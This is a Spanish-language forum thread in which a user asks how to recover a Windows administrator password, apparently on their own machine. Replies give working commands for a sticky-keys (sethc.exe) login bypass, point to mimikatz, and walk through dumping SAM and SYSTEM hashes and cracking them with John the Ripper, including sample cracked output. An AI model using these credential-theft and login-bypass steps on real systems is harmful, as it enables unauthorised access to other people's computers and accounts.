Buenas, me pregunta si alguno me podría explicar como conseguir la contraseña de admin de un ordenador pero sin cambiarlo. Es ordenador propio y aseguro que es totalmente ético ::)
Muchas gracias de antemano.
Hola,
Puedes probar de hacer un cd booteable o pendrive booteable con Ophcrack:
Cita de: WikipediaOphcrack es una herramienta para crackear las contraseñas de Windows basada en las tablas Rainbow.1 Es una implementación muy eficiente de las tablas Rainbow hecha por los inventores de este método. Viene con una Interfaz Gráfica de Usuario GTK+ y corre bajo Windows, Mac OS X (CPU Intel) y también en Linux.
No tienes permitido ver enlaces.
Registrate o
Entra a tu cuenta
Saludos
Gn0m3
Muchas gracias, pero eso es lo que hice jeje :( , lo intente con un pen pero no lo consegui, lo intentare de nuevo.
Muchas gracias de todas formas.
Buenas, googleando un poco he visto que las contraseñas estan guardadas en un archivo que se llama SAM en la ruta: C:\Windows\System32\config la cosa es que no se como podria decodificarlo, alguna idea?
Gracias de antemano.
El archivo "sethc.exe" es un ejecutable que se activa cuando pulsamos repetidamente la tecla SHIFT (Teclas especiales), bueno este archivo tambien funciona en la pagina principal de windows, la que te pide la contraseña de windows. La idea es utilizar un disco de intstalacion de windows para entrar en modo reparacion, acceder al cmd y reemplazar este archivo por "cmd.exe".
Normalmete en el CD de instalacion nos ubicara en "X:" y nosostros nos tendremos que reubicar en "C:" o "D:" segun el equipo. Los comandos serian estos:
X:> D:
D:> cd windows\system32
D:\windows\system32> ren sethc.exe sethc.000
D:\windows\system32> copy cmd.exe sethc.exe
Hecho esto reiniciamos normalmente, cuando nos pida la pass pulsamos repetidamente SHIFT y nos saldra una ventana de cmd, con el comando "control userpasswords2" nos iniciara el administrador de contraseñas de forma grafica y facilmente podremos quitar la contraseña del usuario.
Acuerdate de volver a renombrar "sethc.exe" para que el ejecutable vuelba a funcionar.
Saludos
Si, pero la cosa es que el no busca cómo cambiarla, sino como desencriptar la actual...
Si tenes privs con mimikatz
http://blog.gentilkiwi.com/mimikatz
Hola a todos.
Bueno yo lo hago con john, si cuentas con bt5 o kali-linux lo puedes hacer de la siguiente forma:
root@kali:~# mkdir temp
root@kali:~# cp /media/Sistema/Windows/System32/config/SAM /root/temp
root@kali:~# cp /media/Sistema/Windows/System32/config/SYSTEM /root/temp
root@kali:~# cp /root/darc0des/passwdpro.txt /root/temp
root@kali:~# cd /temp
root@kali:/tem# bkhive SYSTEM hive
bkhive 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author:
[email protected]Root Key : CMI-CreateHive{2A7FB991-7BBE-4F9D-B91E-7CB51D4737F5}
Default ControlSet: 001
Bootkey: 2a4578dbf14272c84a45df64cdfe9ccd
root@kali:/temp# samdump2 SAM hive > hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author:
[email protected]Root Key : CMI-CreateHive{C4E7BA2B-68E8-499C-B1A1-371AC8D717C7}
root@kali:~# john --format=nt -w= /root/temp/passwdpro.txt /root/temp/hashes.txt
Loaded 53 password hashes with no different salts (NT MD4 [128/128 X2 SSE2-16])
(Administrador)
superpassword (shirylmfao)
guesses: 0 time: 0:00:00:00 DONE (Tue May 6 10:28:12 2014) c/s: 669800 trying: paagal - sss
bueno salen algunas cosas mas pero lo que te interesa solo es el user, que en este caso es shirylmfao y el pass que es superpassword, claro esto solo va a darte resultados si la clave esta en el diccionario, de lo contrario no vas a obtener la clave.